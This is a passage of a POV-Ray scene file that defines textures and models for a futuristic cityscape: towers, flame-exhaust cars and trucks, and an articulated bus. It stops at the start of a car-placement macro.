#declare Diff=1; // general diffusion parameter
#declare T_default=texture{pigment{White*0.9}finish{ambient 0 diffuse 1}}
#declare T_default=texture{pigment{rgb Diff}finish{ambient 0 diffuse 1}}
#declare P_Hull=pigment{image_map{jpeg "shiphull" interpolate 2}}
#declare N_Hull=normal{bump_map{jpeg "shiphull" interpolate 2} bump_size 0.5}
#declare P_Metal01=pigment{image_map{jpeg "rust_01" interpolate 2}}
#declare P_Metal03=pigment{image_map{jpeg "rust_02" interpolate 2}}
#declare P_Concrete03=pigment{image_map{jpeg "concrete_03" interpolate 2}}
#declare P_Concrete04=pigment{image_map{jpeg "concrete_04" interpolate 2}}
#declare P_Concrete05=pigment{image_map{jpeg "concrete_05" interpolate 2}}
// -----------------------------------------
// Building 3
// -----------------------------------------
#declare V_WorldBoundMin = <-1.507240, 0.000000, -1.451370>;
#declare V_WorldBoundMax = <1.451370, 14.329500, 1.503610>;
#declare yB=400;
#if (Building3OK=1)
#debug "building 3\n"
#declare T_Concrete = texture{
pigment{
average
pigment_map{
[4 P_Concrete05 scale 1/10]
[3 P_Metal03 scale 1/10]
[1 P_Hull scale 2/10]
}
}
normal{N_Hull scale 2/10}
finish{ambient 0 diffuse Diff}
scale 0.5
}
#declare T_Glass=texture{
pigment{Black}
finish{ambient 0 diffuse 0 reflection Ref*0.9}
}
#declare T_Metal=texture{
T_Chrome_3C finish{ambient 0 reflection Ref*0.3}
}
#include "build03_o.inc"
#declare Build3a=union{
object{ P_cube1_Concrete }
object{ P_cube1_Glass }
object{ P_cube1_Metal }
scale yB/V_WorldBoundMax.y
}
#declare Build3=union{
object{Build3a}
object{Build3a scale <1,-1,1>}
union{
object{Build3a}
object{Build3a scale <1,-1,1>}
translate -y*yB*1.5
}
}
#else
#declare Build3a=box{V_WorldBoundMin,V_WorldBoundMax scale yB/V_WorldBoundMax.y texture{T_default}}
#declare Build3=union{
box{V_WorldBoundMin,V_WorldBoundMax}
box{V_WorldBoundMin,V_WorldBoundMax scale <1,-1,1>}
scale yB/V_WorldBoundMax.y
scale 0.8
texture{T_default}
}
#end
// -----------------------------------------
// Building 4
// -----------------------------------------
#declare V_WorldBoundMin = <-1.750000, 0.000000, -1.570000>;
#declare V_WorldBoundMax = <2.271270, 19.298000, 2.370040>;
#declare yB=400;
#if (Building4OK=1)
#debug "building 4\n"
#declare T_Concrete = texture{
pigment{
average
pigment_map{
[4 P_Concrete03 scale 1/10]
[3 P_Metal01 scale 1/10]
[1 P_Hull scale 2/10]
}
}
normal{N_Hull scale 2/10}
finish{ambient 0 diffuse Diff}
scale 0.5
}
#declare T_Glass=texture{
pigment{Black}
finish{ambient 0 diffuse 0 reflection Ref*0.9}
}
#declare T_Metal=texture{
T_Chrome_3C finish{ambient 0 reflection Ref*0.3}
}
#include "build04_o.inc"
#declare Build4a=union{
object{ P_cylinder1_Concrete }
object{ P_cylinder1_Glass }
object{ P_cylinder1_Metal }
scale yB/V_WorldBoundMax.y rotate -y*10
}
#declare Build4=union{
object{Build4a}
object{Build4a scale <1,-1,1>}
union{
object{Build4a}
object{Build4a scale <1,-1,1>}
translate -y*yB*1.5
}
}
#else
#declare Build4=union{
box{V_WorldBoundMin,V_WorldBoundMax}
box{V_WorldBoundMin,V_WorldBoundMax scale <1,-1,1>}
scale yB/V_WorldBoundMax.y
scale 0.8
texture{T_default}
}
#end
// -----------------------------------------
// Building 5
// -----------------------------------------
#declare V_WorldBoundMin = <-2.037450, 0.000000, -1.999650>;
#declare V_WorldBoundMax = <2.005100, 19.204000, 2.024570>;
#declare yB=400;
#declare T_ConcreteB5 = texture{
pigment{
average
pigment_map{
[4 P_Concrete04 scale 1/10]
[3 P_Metal01 scale 4/10]
[1 P_Hull scale 2/10]
}
}
normal{N_Hull scale 2/10}
finish{ambient 0 diffuse Diff}
scale 0.15
}
#if (Building5OK=1)
#debug "building 5\n"
#declare T_Concrete=texture{T_ConcreteB5}
#declare T_Glass=texture{
pigment{Black}finish{reflection Ref}
}
#include "build05_o.inc"
#declare Build5a=union{
object{ P_cube1_Concrete }
object{ P_cube1_Glass }
scale yB/V_WorldBoundMax.y
}
#declare Build5=union{
object{Build5a}
object{Build5a scale <1,-1,1>}
union{
object{Build5a}
object{Build5a scale <1,-1,1>}
translate -y*yB*1.5
}
}
#else
#declare Build5=union{
box{V_WorldBoundMin,V_WorldBoundMax}
box{V_WorldBoundMin,V_WorldBoundMax scale <1,-1,1>}
scale yB/V_WorldBoundMax.y
scale 0.8
texture{T_default}
}
#end
// -----------------------------------------
// Building 6
// -----------------------------------------
#declare V_WorldBoundMin = <-2.163690, 0.000000, -2.163690>;
#declare V_WorldBoundMax = <2.163690, 23.207899, 2.163690>;
#declare yB=400;
#if (Building6OK=1)
#debug "building 6\n"
#declare T_Concrete = texture{
pigment{
average
pigment_map{
[4 P_Concrete03 scale 1/10]
[3 P_Metal01 scale 1/10]
[1 P_Hull scale 2/10]
}
}
normal{N_Hull scale 2/10}
finish{ambient 0 diffuse Diff}
scale 0.5
}
#declare T_Concrete2 = texture{
pigment{
average
pigment_map{
[2 checker Black,Orange scale 1/20]
[4 P_Concrete03 scale 1/10]
[3 P_Metal01 scale 1/10]
[1 P_Hull scale 2/10]
}
}
normal{N_Hull scale 2/10}
finish{ambient 0 diffuse Diff}
scale 0.5
}
#declare T_Glass=texture{
pigment{Black}
finish{ambient 0 diffuse 0 reflection Ref*0.9}
}
#declare T_Metal=texture{
T_Chrome_3C finish{ambient 0 reflection Ref*0.3}
}
#include "build06_o.inc"
#declare Build6a=union{
object{ P_cube1_Concrete }
object{ P_cube1_Concrete2 }
object{ P_cube1_Glass }
object{ P_cube1_Metal }
scale yB/V_WorldBoundMax.y
}
#declare Build6=union{
object{Build6a}
object{Build6a scale <1,-1,1>}
union{
object{Build6a}
object{Build6a scale <1,-1,1>}
translate -y*yB*1.5
}
}
#else
#declare Build6=union{
box{V_WorldBoundMin,V_WorldBoundMax}
box{V_WorldBoundMin,V_WorldBoundMax scale <1,-1,1>}
scale yB/V_WorldBoundMax.y
scale 0.8
texture{T_default}
}
#end
// -----------------------------------------
// Building 7
// -----------------------------------------
#declare V_WorldBoundMin = <-1.326690, -0.004045, -1.041920>;
#declare V_WorldBoundMax = <1.208000, 6.321690, 1.559110>;
#declare yB=300;
#if (Building7OK=1)
#debug "building 7\n"
#declare T_Concrete = texture{
pigment{
average
pigment_map{
[4 P_Concrete03 scale 1/10]
[3 P_Metal01 scale 1/10]
[1 P_Hull scale 1/15]
}
}
normal{N_Hull scale 1/15}
finish{ambient 0 diffuse Diff}
scale 0.5
}
#declare T_Concrete2 = texture{
pigment{
average
pigment_map{
[5 checker Black,SkyBlue*0.6 scale 1/100]
[2 P_Concrete03 scale 1/10]
[3 P_Metal01 scale 1/10]
[1 P_Hull scale 2/10]
}
}
normal{N_Hull scale 2/10}
finish{ambient 0 diffuse Diff}
scale 0.5
}
#declare T_Concrete3 = texture{
pigment{
average
pigment_map{
[5 checker Red*0.5,ForestGreen*0.5 rotate z*45 scale 1/20]
[2 P_Concrete03 scale 1/10]
[3 P_Metal01 scale 1/10]
[1 P_Hull scale 2/10]
}
}
normal{N_Hull scale 2/10}
finish{ambient 0 diffuse Diff}
scale 0.5
}
#declare T_Glass=texture{
pigment{Black}
finish{ambient 0 diffuse 0 reflection Ref*0.9}
}
#declare T_Metal=texture{
pigment{P_Metal01 scale 1/50}
finish{ambient 0 diffuse 1}
}
#include "build07_o.inc"
#declare Build7a=union{
object{ P_cube1_Concrete }
object{ P_cube1_Concrete2 }
object{ P_cube1_Concrete3 }
object{ P_cube1_Glass }
object{ P_cube1_Metal }
scale yB/V_WorldBoundMax.y
}
#declare Build7=union{
object{Build7a}
object{Build7a scale <1,-1,1>}
union{
object{Build7a}
object{Build7a scale <1,-1,1>}
translate -y*yB*1.5
}
}
#else
#declare Build7=union{
box{V_WorldBoundMin,V_WorldBoundMax}
box{V_WorldBoundMin,V_WorldBoundMax scale <1,-1,1>}
scale yB/V_WorldBoundMax.y
scale 0.8
texture{T_default}
}
#end
#declare rd=seed(2);
// -----------------------------------------
// cars
// -----------------------------------------
// cars and trucks
// Note : only the trucks are (badly) uv-mapped
#debug "Cars\n"
#declare nCars=7;
#declare Cars=array[nCars];
#declare Car=box{-1,1 scale <1.4/2,1.4/2,4/2> texture{pigment{White}}}
#declare i=0;
#while (i<nCars)
#declare Cars[i]=object{Car}
#declare i=i+1;
#end
#if (CarsOK=0)
#declare Car1OK=0;
#declare Car4OK=0;
#declare Car5OK=0;
#declare Car6OK=0;
#declare Car7OK=0;
#declare Truck1OK=0;
#declare Truck2OK=0;
#end
// -----------------------------------------
// car 1 (classic car)
// -----------------------------------------
#if (Car1OK=1)
#declare T_Paint = texture{pigment{Blues[3]}finish{ambient 0 diffuse 0.8 specular 1 roughness 1/1000 reflection {0.2*Ref, 0.8*Ref }}}
#declare T_T_Chrome = texture{T_Chrome_1B finish{ambient 0 reflection 0.25*Ref}}
#declare T_T_Glass = texture{pigment{rgbf <0.6,0.9,0.96,0.7>} finish{ambient 0 diffuse 0.1 specular 1 roughness 1/1000 reflection{0.1*Ref,0.5*Ref}}}
#declare T_T_Hlight = texture{T_T_Glass}
#declare T_T_Motor = texture{T_Chrome_1C finish{ambient 0 reflection 0.25*Ref}}
#declare T_T_Rlight = texture{pigment{rgbf <1,0,0,0.6>} finish{ambient 0 diffuse 1 reflection Ref*0.2}}
#declare T_default = texture{T_Paint}
#declare T_Hlight2 = texture{T_T_Glass}
#declare V_WorldBoundMin = <-2.331450, -0.177594, -1.023210>;
#declare V_WorldBoundMax = <2.543850, 1.081610, 1.023210>;
#declare Intensity=3;
#declare Flame= difference{
sphere{0,1}
plane{y,0}
hollow
texture{
pigment{Clear}
finish{ambient 0 diffuse 0}
}
interior {
media {
emission 2*Intensity
density {
spherical
color_map {
[0 rgb 0]
[1 rgb <1,0.9,0.8>]
}
scale <1,0.4,1>
translate -y*0.1
}
}
media {
emission 1*Intensity
density {
pigment_pattern{
function {min(1,max(0,y))}
turbulence 0.1
lambda 4
}
color_map {
[0.0 rgb <1,.5,.05>]
[0.8 rgb 0]
}
scale 0.4*<1,1,1>
}
}
}
scale <0.2,3,0.2>*0.7
rotate z*90
translate <-1.8,0.2324,0>
}
#debug "Car1a\n"
#include "car1d_o.inc"
#declare Cars[0]=union{
object{ P_cube2_Hlight2 }
object{ P_cube2_Paint }
object{ P_cube2_T_Chrome }
object{ P_cube2_T_Glass }
object{ P_cube2_T_Hlight }
object{ P_cube2_T_Motor }
object{ P_cube2_T_Rlight }
object{ P_cube2_default }
object{ Flame }
rotate y*-90
translate y*0.2
scale 1.7
}
#end
// -----------------------------------------
// car 4 (nose car)
// -----------------------------------------
#if (Car4OK=1)
#declare V_WorldBoundMin = <-0.578364, -1.226680, -0.903809>;
#declare V_WorldBoundMax = <0.954183, 0.837164, 3.047830>;
#debug "Car4a\n"
#declare T_Exhaust = texture{pigment{DarkGreys[8]}finish{ambient 0 diffuse 1 metallic brilliance 4 specular 0.4 roughness 1/30 reflection{0,0.2*Ref}}}
#declare T_Paint = texture{pigment{Reds[2]}finish{ambient 0 diffuse 1 metallic brilliance 4 specular 0.4 roughness 1/30 reflection{0,0.5*Ref}}}
#declare T_Rlight = texture{pigment{Red*0.2}finish{ambient 0 diffuse 1}}
#declare T_Hlight = texture{pigment{White*0.5}finish{ambient 0 diffuse 1 metallic brilliance 4 specular 0.4 roughness 1/30 reflection{0.3*Ref,Ref}}}
#declare T_Glass = texture{pigment{rgbf <0.9,0.9,0.96,0.9>} finish{ambient 0 diffuse 0.1 specular 1 roughness 1/1000 reflection{0.1*Ref,0.5*Ref}}}
#declare T_Chrome = texture{pigment{rgb <1,0.9,0.8>*0.7} finish{ambient 0 diffuse 1 brilliance 5 metallic specular 1 roughness 1/200 reflection{0.1*Ref, 0.5*Ref}}}
#declare Intensity=4;
#declare Flame= difference{
sphere{0,1}
plane{y,0}
hollow
texture{
pigment{Clear}
finish{ambient 0 diffuse 0}
}
interior {
media {
emission 2*Intensity
density {
spherical
color_map {
[0 rgb 0]
[1 rgb <1,0.9,0.8>]
}
scale <1,0.4,1>
translate -y*0.1
}
}
media {
emission 1*Intensity
density {
pigment_pattern{
function {min(1,max(0,y))}
turbulence 0.1
lambda 4
}
color_map {
[0.0 rgb <1,.5,.05>]
[0.8 rgb 0]
}
scale 0.4*<1,1,1>
}
}
}
scale <0.2,3,0.2>*0.7
rotate -x*90
}
#declare Flames=union{
object{Flame translate <0.3869,-0.3826,-0.08>}
object{Flame translate <0,-0.3826,-0.08>}
object{Flame translate <0.3869,-0.81,0>}
object{Flame translate <0,-0.81,0>}
translate -z*0.4
}
#include "car4_o.inc"
#declare Cars[2]=union{
object{ P_cube1_Chrome }
object{ P_cube1_Exhaust }
object{ P_cube1_Glass }
object{ P_cube1_Hlight }
object{ P_cube1_Paint }
object{ P_cube1_Rlight }
object{ Flames }
translate y*1.1-z*1
scale 1.6
}
#end
// -----------------------------------------
// car 5 (boat car)
// -----------------------------------------
#if (Car5OK=1)
#declare T_default = texture{pigment{Blues[0]}finish{ambient 0 diffuse 1 metallic brilliance 4 specular 0.4 roughness 1/30 reflection{0,0.5*Ref}}}
#declare T_Rearlight = texture{pigment{Red*0.2}finish{ambient 0 diffuse 1}}
#declare T_ReactorIn = texture{pigment{bozo color_map{[0 Red*0.2][1 White*0.2]}} finish{ambient 0 diffuse 1}}
#declare T_Mirror = texture{pigment{Black}finish{ambient 0 diffuse 0 roughness 1/30 reflection 1*Ref}}
#declare T_Headlight = texture{pigment{White*0.5}finish{ambient 0 diffuse 1 metallic brilliance 4 specular 0.4 roughness 1/30 reflection{0.3*Ref,Ref}}}
#declare T_Glass = texture{pigment{rgbf <0.9,0.9,0.96,0.9>} finish{ambient 0 diffuse 0.1 specular 1 roughness 1/1000 reflection{0.1*Ref,0.5*Ref}}}
#declare T_Chrome = texture{pigment{rgb <1,0.9,0.8>*0.7} finish{ambient 0 diffuse 1 brilliance 5 metallic specular 1 roughness 1/200 reflection{0.1*Ref, 0.5*Ref}}}
#declare Intensity=3;
#declare Flame= difference{
sphere{0,1}
plane{y,0}
hollow
texture{
pigment{Clear}
finish{ambient 0 diffuse 0}
}
interior {
media {
emission 2*Intensity
density {
spherical
color_map {
[0 rgb 0]
[1 rgb <1,0.9,0.8>]
}
scale <1,0.4,1>
translate -y*0.1
}
}
media {
emission 1*Intensity
density {
pigment_pattern{
function {min(1,max(0,y))}
turbulence 0.1
lambda 4
}
color_map {
[0.0 rgb <1,.5,.05>]
[0.8 rgb 0]
}
scale 0.4*<1,1,1>
}
}
}
scale <0.2,3,0.2>*0.9
rotate z*90
scale <1,0.8,1>
}
#declare Flames=union{
object{Flame translate <0,-0.166471,0.3835>}
object{Flame translate <0,-0.166471,-0.3835>}
translate x*-1.6
}
#declare V_WorldBoundMin = <-2.367380, -0.440462, -0.988990>;
#declare V_WorldBoundMax = <2.089100, 1.630210, 0.989146>;
#debug "Car5a\n"
#include "car5_o.inc"
#declare Cars[1]=union{
object{ P_cube2_Chrome }
object{ P_cube2_Glass }
object{ P_cube2_Headlight }
object{ P_cube2_Mirror }
object{ P_cube2_ReactorIn }
object{ P_cube2_Rearlight }
object{ P_cube2_default }
object{ Flames }
translate y*0.2
scale 1.4
rotate -y*90
}
#end
// -----------------------------------------
// car 6 (speeder car with bulb canopy)
// -----------------------------------------
#if (Car6OK=1)
#declare V_WorldBoundMin = <-1.817420, -0.026592, -1.289770>;
#declare V_WorldBoundMax = <2.914590, 1.447330, 1.289770>;
#declare T_Reactor = texture{pigment{LightGreys[3]}finish{ambient 0 diffuse 1 metallic brilliance 4 specular 0.4 roughness 1/30 reflection{0,0.2*Ref}}}
#declare T_Paint = texture{
pigment{Reds[5]*0.45+Orange*0.45}
finish{
ambient 0 diffuse 1 specular 1 roughness 1/40 metallic brilliance 3
reflection{0,0.3*Ref fresnel on}
}
}
#declare T_Rlight = texture{pigment{Red*0.2}finish{ambient 0 diffuse 1}}
#declare T_Hlight = texture{pigment{White*0.5}finish{ambient 0 diffuse 1 metallic brilliance 4 specular 0.4 roughness 1/30 reflection{0.3*Ref,Ref}}}
#declare T_Glass = texture{pigment{rgbf <0.4,0.9,0.96,0.6>/2} finish{ambient 0 diffuse 0.1 specular 1 roughness 1/1000 reflection{0*Ref,0.9*Ref}}}
#declare T_Chrome = texture{pigment{rgb <1,0.9,0.8>*0.7} finish{ambient 0 diffuse 1 brilliance 5 metallic specular 1 roughness 1/200 reflection{0.1*Ref, 0.5*Ref}}}
#declare Intensity=3;
#declare Flame= difference{
sphere{0,1}
plane{y,0}
hollow
texture{
pigment{Clear}
finish{ambient 0 diffuse 0}
}
interior {
media {
emission 2*Intensity
density {
spherical
color_map {
[0 rgb 0]
[1 rgb <1,0.9,0.8>]
}
scale <1,0.4,1>
translate -y*0.1
}
}
media {
emission 1*Intensity
density {
pigment_pattern{
function {min(1,max(0,y))}
turbulence 0.1
lambda 4
}
color_map {
[0.0 rgb <1,.5,.05>]
[0.8 rgb 0]
}
scale 0.4*<1,1,1>
}
}
}
scale <0.2,3,0.2>*0.9
rotate z*90
translate <-1.1,0.25,0>
}
#debug "Car6a\n"
#include "car6_o.inc"
#declare Cars[3]=union{
object{ P_cube2_Chrome }
object{ P_cube2_Glass }
object{ P_cube2_Hlight }
object{ P_cube2_Paint interior{ior 10}}
object{ P_cube2_Reactor }
object{ P_cube2_Rlight }
object{ Flame }
scale 1.4
rotate -y*90
}
#end
// -----------------------------------------
// car 7 (classic car with keel)
// -----------------------------------------
#if (Car7OK=1)
#declare V_WorldBoundMin = <-1.824800, -0.207535, -1.012980>;
#declare V_WorldBoundMax = <2.266020, 1.866860, 1.012980>;
#declare T_Mirror = texture{pigment{Black}finish{ambient 0 diffuse 0 roughness 1/30 reflection 1}}
#declare T_Exhaust = texture{pigment{DarkGreys[8]}finish{ambient 0 diffuse 1 metallic brilliance 4 specular 0.4 roughness 1/30 reflection{0,0.2*Ref}}}
#declare T_Paint = texture{
pigment{LightGreys[8]}
finish{
ambient 0 diffuse 1 metallic brilliance 4 specular 0.4 roughness 1/30 reflection{0,0.5*Ref}
}
}
#declare T_Rlight = texture{pigment{Red*0.2}finish{ambient 0 diffuse 1}}
#declare T_Hlight = texture{pigment{White*0.5}finish{ambient 0 diffuse 1 metallic brilliance 4 specular 0.4 roughness 1/30 reflection{0.3*Ref,Ref}}}
#declare T_Glass = texture{pigment{rgbf <0.9,0.9,0.96,0.9>} finish{ambient 0 diffuse 0.1 specular 1 roughness 1/1000 reflection{0.1*Ref,0.5*Ref}}}
#declare T_Chrome = texture{pigment{rgb <1,0.9,0.8>*0.7} finish{ambient 0 diffuse 1 brilliance 5 metallic specular 1 roughness 1/200 reflection{0.1*Ref, 0.5*Ref}}}
#declare T_Slight = texture{pigment{Orange*0.2}finish{ambient 0 diffuse 1}}
#declare T_default = texture{T_Paint}
#declare Intensity=3;
#declare Flame= difference{
sphere{0,1}
plane{y,0}
hollow
texture{
pigment{Clear}
finish{ambient 0 diffuse 0}
}
interior {
media {
emission 2*Intensity
density {
spherical
color_map {
[0 rgb 0]
[1 rgb <1,0.9,0.8>]
}
scale <1,0.4,1>
translate -y*0.1
}
}
media {
emission 1*Intensity
density {
pigment_pattern{
function {min(1,max(0,y))}
turbulence 0.1
lambda 4
}
color_map {
[0.0 rgb <1,.5,.05>]
[0.8 rgb 0]
}
scale 0.4*<1,1,1>
}
}
}
scale <0.2,3,0.2>*0.8
rotate z*90
}
#declare Flames=union{
object{Flame translate <-1.25,0.48,-0.22>}
object{Flame translate <-1.25,0.48,0.22>}
}
#debug "Car7a\n"
#include "car7_o.inc"
#declare Cars[4]=union{
object{ P_cube2_Chrome }
object{ P_cube2_Exhaust }
object{ P_cube2_Glass }
object{ P_cube2_Hlight }
object{ P_cube2_Mirror }
object{ P_cube2_Paint }
object{ P_cube2_Rlight }
object{ P_cube2_Slight }
object{ P_cube2_default }
object{ Flames }
scale 1.6
rotate -y*90
}
#end
// -----------------------------------------
// truck 1 (boxy one)
// -----------------------------------------
#if (Truck1OK=1)
#declare V_WorldBoundMin = <-5.008890, -1.144870, -1.146160>;
#declare V_WorldBoundMax = <2.620000, 1.122500, 1.146160>;
#declare T_Paint = texture{pigment{average pigment_map{[1 P_Metal01 scale 1/4][2 Blues[6]]}}finish{ambient 0 diffuse 1 metallic brilliance 1 specular 0.4 roughness 1/30}}
#declare T_Rlight = texture{pigment{Red*0.2}finish{ambient 0 diffuse 1}}
#declare T_Hlight = texture{pigment{White*0.5}finish{ambient 0 diffuse 1 metallic brilliance 4 specular 0.4 roughness 1/30 reflection{0.3*Ref,Ref}}}
#declare T_Glass = texture{pigment{rgbf <0.9,0.9,0.96,0.9>} finish{ambient 0 diffuse 0.1 specular 1 roughness 1/1000 reflection{0.1*Ref,0.5*Ref}}}
#declare T_Chrome = texture{pigment{rgb <1,0.9,0.8>*0.7} finish{ambient 0 diffuse 1 brilliance 5 metallic specular 1 roughness 1/200 reflection{0.4*Ref, 0.99*Ref}}}
#declare T_Metal = texture{pigment{average pigment_map{[1 P_Metal01 scale 1/10][1 DarkGreys[2]]}}finish{ambient 0 diffuse 0.6 metallic brilliance 4 specular 0.4 roughness 1/30}}
#declare Intensity=3;
#declare Flame= difference{
sphere{0,1}
plane{y,0}
hollow
texture{
pigment{Clear}
finish{ambient 0 diffuse 0}
}
interior {
media {
emission 2*Intensity
density {
spherical
color_map {
[0 rgb 0]
[1 rgb <1,0.9,0.8>]
}
scale <1,0.4,1>
translate -y*0.1
}
}
media {
emission 1*Intensity
density {
pigment_pattern{
function {min(1,max(0,y))}
turbulence 0.1
lambda 4
}
color_map {
[0.0 rgb <1,.5,.05>]
[0.8 rgb 0]
}
scale 0.4*<1,1,1>
}
}
}
scale <0.25,4,0.25>
rotate z*90
}
#declare Flames=union{
object{Flame translate <0,0.46,0.41>}
object{Flame translate <0,0.46,-0.41>}
object{Flame translate <0,-0.35,0.41>}
object{Flame translate <0,-0.35,-0.41>}
translate -x*3.8
}
#debug "Truck 1a\n"
#include "truck1_o.inc"
#declare Cars[5]=union{
object{ P_cube1_Chrome }
object{ P_cube1_Glass }
object{ P_cube1_Hlight }
object{ P_cube1_Metal }
object{ P_cube1_Paint }
object{ Flames }
translate y*1.1+x
scale 1.7
rotate -y*90
}
#end
// -----------------------------------------
// truck 2 (with side reactors)
// -----------------------------------------
#if (Truck2OK=1)
#declare V_WorldBoundMin = <-1.975230, -0.354250, -3.138580>;
#declare V_WorldBoundMax = <1.975230, 1.482000, 3.133740>;
#declare T_Paint = texture{pigment{Greens[1]}finish{ambient 0 diffuse 1 metallic brilliance 1 specular 0.4 roughness 1/30 reflection{0.1*Ref,0.5*Ref}}}
#declare T_Paint2 = texture{pigment{image_map{jpeg "csign33" interpolate 2} scale <-1.3,1,1>/16}finish{ambient 0 diffuse 0.6 metallic brilliance 1 specular 0.4 roughness 1/30}}
#declare T_Rlight = texture{pigment{Red*0.2}finish{ambient 0 diffuse 1}}
#declare T_Hlight = texture{pigment{White*0.5}finish{ambient 0 diffuse 1 metallic brilliance 4 specular 0.4 roughness 1/30 reflection{0.3*Ref,Ref}}}
#declare T_Glass = texture{pigment{rgbf <0.7,0.9,0.96,0.9>} finish{ambient 0 diffuse 0.1 specular 1 roughness 1/1000 reflection{0.1*Ref,0.5*Ref}}}
#declare T_Chrome = texture{T_Paint} //texture{pigment{rgb <1,0.9,0.8>*0.7} finish{ambient 0 diffuse 1 brilliance 2 metallic specular 1 roughness 1/200 reflection{0*Ref, 0.2*Ref}}}
#declare T_Reactor = texture{pigment{DarkGreys[2]}finish{ambient 0 diffuse 1 metallic brilliance 1 specular 0.4 roughness 1/30}}
#declare T_default=texture{T_Reactor}
#declare Intensity=3;
#declare Flame= difference{
sphere{0,1}
plane{y,0}
hollow
texture{
pigment{Clear}
finish{ambient 0 diffuse 0}
}
interior {
media {
emission 2*Intensity
density {
spherical
color_map {
[0 rgb 0]
[1 rgb <1,0.9,0.8>]
}
scale <1,0.4,1>
translate -y*0.1
}
}
media {
emission 1*Intensity
density {
pigment_pattern{
function {min(1,max(0,y))}
turbulence 0.1
lambda 4
}
color_map {
[0.0 rgb <1,.5,.05>]
[0.8 rgb 0]
}
scale 0.4*<1,1,1>
}
}
}
scale <0.2,3,0.2>
rotate -x*90
}
#declare Flames=union{
object{Flame translate <1.69,-0.1025,0>}
object{Flame translate <-1.69,-0.1025,0>}
translate -z*2.5
}
#debug "Truck 2a\n"
#include "truck2_o.inc"
#declare Cars[6]=union{
object{ P_cube2_Chrome }
object{ P_cube2_Glass }
object{ P_cube2_Hlight }
object{ P_cube2_Paint }
object{ P_cube2_Paint2 }
object{ P_cube2_Reactor }
object{ P_cube2_Rlight }
object{ P_cube2_default }
object{ Flames }
scale 1.7
}
#end
// -----------------------------------------
// Bus
// -----------------------------------------
#if (BusOK=1)
#declare F_Paint=finish{
ambient 0
diffuse 0.7
specular 1
roughness 1/1000
reflection {0,0.4*Ref}
}
#declare F_BrushedMetal=finish{
ambient 0
diffuse 0.6
metallic
brilliance 1
specular 0.1
roughness 1/20
reflection {0,0.1*Ref}
}
#declare T_Paint = texture{// body paint
pigment_pattern{
gradient z
rotate x*45
scale 10
translate z*8
}
texture_map{
[0.95
gradient y
texture_map{
[0.6 pigment{White}finish{F_BrushedMetal}]
[0.6 pigment{White*0.1}finish{F_Paint}]
[0.7 pigment{White*0.1}finish{F_Paint}]
[0.7 pigment{rgb <1,0.3,0.2>}finish{F_Paint}]
[0.8 pigment{rgb <1,0.3,0.2>}finish{F_Paint}]
[0.8 pigment{rgb <247,197,27>/255}finish{F_Paint}]
}
]
[0.95 pigment{SkyBlue}finish{F_BrushedMetal}]
}
scale 0.5
}
// use the transparent glass if necessary (takes longer to render)
// for instance when using the version with interior lighting
#declare T_Glass = texture{
// pigment{rgbf <0.6,0.9,0.96,0.6>} // for transparent glass
pigment{rgb <0.6,0.9,0.96>}
finish{ambient 0 diffuse 0.1 specular 1 roughness 1/1000
reflection{0.1*Ref,0.5*Ref}
}
}
#declare T_Metal = texture{pigment{DarkGreys[2]}finish{ambient 0 diffuse 1 metallic brilliance 4 specular 0.4 roughness 1/30}}
#declare Intensity=3;
#declare Flame= difference{
sphere{0,1}
plane{y,0}
hollow
texture{
pigment{Clear}
finish{ambient 0 diffuse 0}
}
interior {
media {
emission 2*Intensity
density {
spherical
color_map {
[0 rgb 0]
[1 rgb <1,0.9,0.8>]
}
scale <1,0.4,1>
translate -y*0.1
}
}
media {
emission 1*Intensity
density {
pigment_pattern{
function {min(1,max(0,y))}
turbulence 0.1
lambda 4
}
color_map {
[0.0 rgb <1,.5,.05>]
[0.8 rgb 0]
}
scale 0.4*<1,1,1>
}
}
}
scale <0.25,4,0.25>*0.5
rotate -x*90
}
#declare V_WorldBoundMin = <-2.088460, -0.543148, -5.648700>;
#declare V_WorldBoundMax = <2.088460, 2.074820, 0.168207>;
#debug "bus wagon\n"
#include "bus_o.inc"
#declare Bus_Wagon=union{
object{ P_cube1_Glass }
object{ P_cube1_Metal }
object{ P_cube1_Paint }
}
#declare V_WorldBoundMin = <-0.693440, 0.165479, -0.002704>;
#declare V_WorldBoundMax = <0.693422, 1.337700, 2.596930>;
#debug "bus head\n"
#include "bushead_o.inc"
#declare Bus_Head=union{
object{ P_cube1_cut4_Glass }
object{ P_cube1_cut4_Metal }
object{ P_cube1_cut4_Paint }
object{Flame translate <0,-0.13,1.1>}
}
#declare V_WorldBoundMin = <-0.608794, 0.079604, -1.761380>;
#declare V_WorldBoundMax = <0.608890, 1.330880, 0.168207>;
#debug "bus tail\n"
#include "bustail_o.inc"
#declare Bus_Tail=union{
object{ P_cube1_cut2_Metal }
object{ P_cube1_cut2_Paint }
}
#declare BusStraight=union{
object{Bus_Head}
object{Bus_Wagon}
object{Bus_Wagon translate -z*5.68}
object{Bus_Wagon translate -z*5.68*2}
object{Bus_Wagon translate -z*5.68*3}
object{Bus_Wagon translate -z*5.68*4}
object{Bus_Wagon translate -z*5.68*5}
object{Bus_Tail translate -z*5.68*6}
scale 2.5
}
// the following bus is not used in the image
// it's the same as above, but with only 3 wagons and it's turning
#declare Bus_Angle=-15;
#declare BusTurn=union{
object{Bus_Head}
union{
object{Bus_Wagon}
union{
object{Bus_Wagon}
union{
object{Bus_Wagon}
object{
Bus_Tail
rotate y*Bus_Angle
translate -z*5.68
}
rotate y*Bus_Angle
translate -z*5.68
}
rotate y*Bus_Angle
translate -z*5.68
}
rotate y*Bus_Angle
}
scale 2.5
}
// this bus is not used in the image
// same bus as above but with interior lighting
//
#declare BusLight=light_group{
object{Bus_Wagon}
light_source{<0,1,-2.5> C_BusLight*3 media_interaction off}
global_lights on
}
#declare BusStraightLight=union{
object{Bus_Head}
object{BusLight}
object{BusLight translate -z*5.68}
object{BusLight translate -z*5.68*2}
object{BusLight translate -z*5.68*3}
object{BusLight translate -z*5.68*4}
object{BusLight translate -z*5.68*5}
object{BusLight translate -z*5.68*6}
scale 2.5
}
#declare BusTurnLight=union{
object{Bus_Head}
union{
object{BusLight}
union{
object{BusLight}
union{
object{BusLight}
object{
Bus_Tail
rotate y*Bus_Angle
translate -z*5.68
}
rotate y*Bus_Angle
translate -z*5.68
}
rotate y*Bus_Angle
translate -z*5.68
}
rotate y*Bus_Angle
}
scale 2.5
}
#else
#declare BusStraight=box{<-5,0,-5.6*2.5*4>,<5,5,0> texture{pigment{Cyan}}}
#declare BusTurn=object{BusStraight}
#declare BusStraightLight=object{BusStraight}
#declare BusTurnLight=object{BusStraight}
#end
// -----------------------------------------
// Car placement
// -----------------------------------------
#if (CarsOK=1)
#macro RandZ()
